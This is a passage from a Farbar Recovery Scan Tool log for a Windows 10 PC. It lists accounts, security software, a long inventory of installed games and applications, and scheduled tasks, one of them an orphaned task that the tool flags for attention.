    2014-07-23 17:57 - 2015-08-09 01:04 - 0000028 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Usage.ini
    2014-05-02 20:55 - 2014-08-28 11:18 - 0007599 _____ () C:\Users\Kym\AppData\Local\Resmon.ResmonCfg
    2015-06-18 16:22 - 2015-06-18 16:27 - 0000260 _____ () C:\ProgramData\csgobm.project
    2015-06-18 16:22 - 2015-06-18 16:27 - 0000002 _____ () C:\ProgramData\csgobm2.project
    2015-06-18 16:19 - 2015-06-18 16:19 - 0010299 _____ () C:\ProgramData\csgobmbacked.cfg
    2015-06-18 16:19 - 2015-06-18 16:19 - 0000077 _____ () C:\ProgramData\csgobmsettings.ini
    2015-08-09 01:27 - 2015-08-09 01:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

    Some files in TEMP:
    ====================
    C:\Users\Kym\AppData\Local\Temp\sqlite3.dll


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-02-29 12:25

    ==================== End of FRST.txt ============================

    Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
    Ran by Kym (2016-03-01 22:12:09)
    Running from C:\Users\Kym\Desktop
    Windows 10 Home (X64) (2015-08-08 15:48:30)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-788086572-3644745805-1037152649-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-788086572-3644745805-1037152649-503 - Limited - Disabled)
    Guest (S-1-5-21-788086572-3644745805-1037152649-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-788086572-3644745805-1037152649-1002 - Limited - Enabled)
    Kym (S-1-5-21-788086572-3644745805-1037152649-1000 - Administrator - Enabled) => C:\Users\Kym

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
    AS: Spybot - Search and Destroy (Enabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    µTorrent (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\uTorrent) (Version: 3.4.5.41712 - BitTorrent Inc.)
    Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
    Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
    Adobe Premiere Elements 11 (HKLM\...\PremElem110) (Version: 11.0 - Adobe Systems Incorporated)
    Adobe Premiere Elements 11 (Version: 11.0 - Adobe Systems Incorporated) Hidden
    Adobe Reader XI (11.0.13) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
    AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
    Apple Application Support (32-bit) (HKLM-x32\...\{3540ADD5-822B-47FB-B1C2-CD7B2C8E9FEC}) (Version: 4.0.2 - Apple Inc.)
    Apple Application Support (64-bit) (HKLM\...\{C9C0FE2C-602E-49D7-8C42-5B9E8FF04798}) (Version: 4.0.2 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{FD244E19-6EFE-4A2D-948A-0D45D4C168BE}) (Version: 9.0.0.26 - Apple Inc.)
    Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
    Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
    Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.2.2218 - AVAST Software)
    Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
    Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
    Beyond Gravity (HKLM-x32\...\Steam App 317510) (Version: - Qwiboo Ltd)
    BioShock (HKLM-x32\...\Steam App 7670) (Version: - 2K Boston)
    BioShock 2 (HKLM-x32\...\Steam App 8850) (Version: - 2K Marin)
    BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
    Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
    Brother MFL-Pro Suite DCP-J4110DW (HKLM-x32\...\{DD98C438-D769-4677-AA87-3481FA32D20C}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
    Catalyst Control Center Next Localization BR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CHS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CHT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization DA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization DE (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization EL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization ES (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization FI (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization FR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization HU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization IT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization JA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization KO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization NL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization NO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization PL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization RU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization SV (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization TH (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization TR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Clicker Heroes (HKLM-x32\...\Steam App 363970) (Version: - Playsaurus)
    Contagion (HKLM-x32\...\Steam App 238430) (Version: - Monochrome LLC)
    Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
    Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
    DayZ (HKLM-x32\...\Steam App 221100) (Version: - Bohemia Interactive)
    Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
    Dota 2 (HKLM-x32\...\Steam App 570) (Version: - Valve)
    Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    f.lux (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Flux) (Version: - )
    Full Tilt Poker (HKLM-x32\...\{D4C9692E-4EFA-4DA0-8B7F-9439466D9E31}) (Version: 5.44.1.WIN.FullTilt.COM - )
    Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
    Google Drive (HKLM-x32\...\{EF61675D-9BBC-4EC7-B906-F13BE8D3BD20}) (Version: 1.27.1227.2094 - Google, Inc.)
    Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
    Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
    Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
    Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
    IBM SPSS Statistics 23 (HKLM\...\{C3BA73A4-2A45-4036-8541-4F5F8146078B}) (Version: 23.0.0.0 - IBM Corp)
    iExplorer 3.6.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3308 - Intel Corporation)
    Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
    Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
    Internode Monthly Usage Meter 8.6.3 (HKLM-x32\...\Internode Monthly Usage Meter_is1) (Version: - )
    iTunes (HKLM\...\{88509E20-3936-4D88-A1C0-B274C7BB5151}) (Version: 12.3.0.44 - Apple Inc.)
    Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
    Java 8 Update 74 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218074F0}) (Version: 8.0.740.2 - Oracle Corporation)
    League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
    League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
    Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve)
    Logitech G35 (HKLM\...\{27607A94-33AC-4AA7-AACE-95AF6ACA3E30}) (Version: 1.1.178 - Logitech)
    Logitech Gaming Software 8.70 (HKLM\...\Logitech Gaming Software) (Version: 8.70.315 - Logitech Inc.)
    LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
    LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
    Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
    Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version: - Gazillion Entertainment)
    Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version: - 4A Games)
    Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
    Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
    Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: - )
    Monaco What's Yours Is Mine (HKLM-x32\...\Monaco What's Yours Is Mine_is1) (Version: Monaco What's Yours Is Mine - )
    MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
    MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
    Nitronic Rush (IGF Pro 2012) version 20111017.0 (HKLM-x32\...\{9B55759D-424F-4CB1-B84E-AAE83CC1D20A}_is1) (Version: 20111017.0 - DigiPen)
    Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201}) (Version: 12.1.0005 - Nuance Communications, Inc.)
    Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
    NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
    ON_OFF Charge 2 B13.1028.1 (HKLM-x32\...\InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Version: 1.00.0000 - GIGABYTE)
    ON_OFF Charge 2 B13.1028.1 (x32 Version: 1.00.0000 - GIGABYTE) Hidden
    Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
    OpenAL (HKLM-x32\...\OpenAL) (Version: - )
    Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
    PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 14.00.0000 - Nuance Communications, Inc.)
    PokerStars (HKLM-x32\...\PokerStars) (Version: - PokerStars)
    PRE11 STI 64Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
    Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.2.4 - Razer Inc.)
    Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28188 - Razer Inc.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
    Remote Mouse version 2.70 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.70 - Remote Mouse)
    Scansoft PDF Professional (x32 Version: - ) Hidden
    Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
    Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
    Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
    Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
    Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
    Spotify (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
    Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.5.43 - Safer-Networking Ltd.)
    StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
    Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
    Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version: - Valve)
    TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
    TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp)
    The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
    Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Steam App 359550) (Version: - Ubisoft Montreal)
    Total War: ROME II (HKLM-x32\...\Steam App 214950) (Version: - Creative Assembly)
    Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
    Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Uplay (HKLM-x32\...\Uplay) (Version: 14.0 - Ubisoft)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
    World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {00BB5CDE-A0A3-4126-A329-684FCE96F2DA} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
    Task: {025E3B95-A6D2-4C85-BD24-71C170E5A887} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
    Task: {050D098B-C2C3-4064-986C-7B3596E444B9} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
    Task: {052BB96E-EC57-4A5E-A676-5F530A65E1E1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
    Task: {105E72D9-5D9B-4EBD-BC8B-F6126EAAA214} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {111506E3-934F-4F4D-9D88-D03FD254704B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-16] (Adobe Systems Incorporated)
    Task: {12E05F11-8F42-466E-B87E-05F00D57783A} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {154B1B4C-8AD3-4E88-87B8-08F151623FF3} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
    Task: {19DDEC2D-39E9-4390-B737-F534A99F91FC} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
    Task: {2F2930D6-5ED7-4563-8CC0-D92C411FA7B9} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-12] (Microsoft Corporation)
    Task: {3E5A6177-182D-4F8D-A9F3-8E88742C9F43} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
    Task: {3F60BAAC-153B-4504-9150-B1875260A145} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
    Task: {4444829F-A5AF-49DC-AF46-C3F292BDE7F4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
    Task: {4A494596-5721-43AD-B292-95778C23DE63} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {4C4DB1A9-42FA-4381-9A15-5850F64B0A92} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
    Task: {57517555-5931-478E-AC60-FE526E78EA1D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
    Task: {5AE7144B-08D0-4C2C-83D2-0E78DFE05C4D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe
    Task: {672C6DB8-E782-46C4-862A-91937DDD6CCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
    Task: {6A6EF366-2189-44F1-810D-31ADBAD25AD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
    Task: {6EC4A1B2-08CF-4BE5-86DE-014C8ED8CEFF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
    Task: {70F8276A-CEAC-48F6-AF84-A7EF81E36D85} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
    Task: {8E8CEF76-7805-4BD1-90FE-CC39F53EDC96} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
    Task: {9F538C47-5B98-42B5-A6A0-FFC9989F17DE} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {A39A9765-388B-4CFB-9115-FF2DE387651A} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
    Task: {AD51084B-8DF2-45A4-A9D7-BB445D07A559} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
    Task: {B771CEDA-ABD2-43D9-9157-9B1E2DEE95CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
    Task: {B7A49348-60C5-42CB-A154-78E339B9B4EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
    Task: {C16563DF-BFCB-40D7-BD4E-0C8FFFFCE317} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {C4FE1DCE-FEAA-4B30-95BA-F1A5394963A4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {C85142E9-7D8C-4BBB-8B73-0987957BAFF6} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2015-12-04] (Advanced Micro Devices, Inc.)
    Task: {CA6266EC-F1C1-4C19-AA06-B0AD8D0AB114} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
    Task: {CD7F75C4-6EF1-4B40-A64D-B4F4D874B8BC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {DD980370-DE9B-48AE-8689-09B4DE7A48CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
    Task: {E4C27559-2796-43A7-BB20-D17DF93E1921} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
    Task: {E645F142-F242-4000-9AAD-6E453D099B5F} - System32\Tasks\{87D6A7E6-7111-4A2D-8253-E40D040C3BA9} => pcalua.exe -a F:\Seagate\Setup.exe -d F:\Seagate
    Task: {EA61F2D7-4B50-4E49-896F-214D33BA8108} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
    Task: {EB850747-54A4-4253-8644-DD8AF435E430} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
    Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - \{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} -> No File <==== ATTENTION
